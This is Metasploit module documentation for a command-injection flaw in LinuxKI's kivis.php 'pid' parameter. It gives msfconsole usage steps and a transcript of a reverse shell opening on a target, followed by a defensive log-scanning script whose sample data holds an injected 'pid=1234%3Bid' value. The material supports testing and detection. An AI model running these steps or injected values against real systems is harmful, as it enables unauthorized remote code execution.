## Description

This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. The `pid` parameter of `kivis.php`, received from the user, is passed to the `shell_exec` function without validation, resulting in a command injection vulnerability.

## Vulnerable Application

LinuxKI Toolset <= 6.01

To test this application, you need to download version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile). Do not forget to replace [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).

## Verification Steps

1. Start `msfconsole`
2. `use exploit/linux/http/linuxki_rce`
3. `set RHOST `
4. `set RPORT `
5. `set LHOST `
6. `set LPORT `
7. Ideally run `check`
8. `set LHOST `
9. `set LPORT `
10. Optional: `set TARGETURI ` if the target system uses a different path to LinuxKI
11. `exploit`

## Scenarios

### LinuxKI Toolset v6.01

```
msf5 > use exploit/linux/http/linuxki_rce
msf5 exploit(linux/http/linuxki_rce) > set rhosts 10.0.0.1
rhosts => 10.0.0.1
msf5 exploit(linux/http/linuxki_rce) > set rport 8080
rport => 8080
msf5 exploit(linux/http/linuxki_rce) > check
[+] 10.0.0.1:8080 - The target is vulnerable.
msf5 exploit(linux/http/linuxki_rce) > set lhost 10.0.0.5
lhost => 10.0.0.5
msf5 exploit(linux/http/linuxki_rce) > run

[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Sending exploit...
[*] Command shell session 1 opened (10.0.0.5:4444 -> 10.0.0.1:58914) at 2020-05-19 08:32:32 +0300

id
uid=48(apache) gid=48(apache) groups=48(apache)
```
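The Description above states the root cause: the `pid` parameter reaches `shell_exec` unvalidated, whereas a process ID is only ever a short run of digits. That gives defenders a precise allow-list to check against in web server logs. The following is an added example (not part of this module's documentation or the LinuxKI project) that parses constructed Apache-style access log lines and flags any request to `kivis.php` whose decoded `pid` value is not a plain integer. The log lines, hostnames and the `/linuxki/` path are constructed for illustration; the script basename is matched regardless of directory so that a non-default `TARGETURI` is still covered.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" log format (not real traffic).
# The second line carries a non-numeric pid; the others are benign.
SAMPLE_LOG = """\
10.0.0.7 - - [19/May/2020:08:30:01 +0300] "GET /linuxki/kivis.php?pid=1234 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [19/May/2020:08:32:31 +0300] "GET /linuxki/kivis.php?pid=1234%3Bid HTTP/1.1" 200 221 "-" "Mozilla/5.0"
10.0.0.7 - - [19/May/2020:08:33:10 +0300] "GET /linuxki/index.php HTTP/1.1" 200 880 "-" "Mozilla/5.0"
10.0.0.7 - - [19/May/2020:08:35:42 +0300] "GET /linuxki/kivis.php?pid=42&view=full HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Allow-list for a Linux PID: digits only, bounded length (pid_max is at most 2^22).
PID_OK = re.compile(r'^\d{1,10}$')


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_pid_requests(log_text, script_name="kivis.php"):
    """Flag requests to script_name whose pid query value is not a plain integer.

    parse_qs percent-decodes values, so an encoded separator such as %3B is
    compared in its decoded form. Only the query string is visible in an
    access log; a pid sent in a POST body needs application or WAF logging.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if parts.path.rsplit("/", 1)[-1] != script_name:
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("pid", []):
            if not PID_OK.match(raw):
                findings.append({
                    "src": rec["src"],
                    "ts": rec["ts"],
                    "pid": raw,
                    "target": rec["target"],
                })
    return findings


if __name__ == "__main__":
    for f in suspicious_pid_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} non-numeric pid {f['pid']!r} in {f['target']}")
```

The same `^\d+$` allow-list is what the application itself should enforce (for example, casting `pid` to an integer) before anything derived from it is handed to a shell; `escapeshellarg` alone would merely quote the value, while rejecting anything that is not a PID removes the injection surface entirely. Feed the function your real access log instead of `SAMPLE_LOG` to search for historical hits.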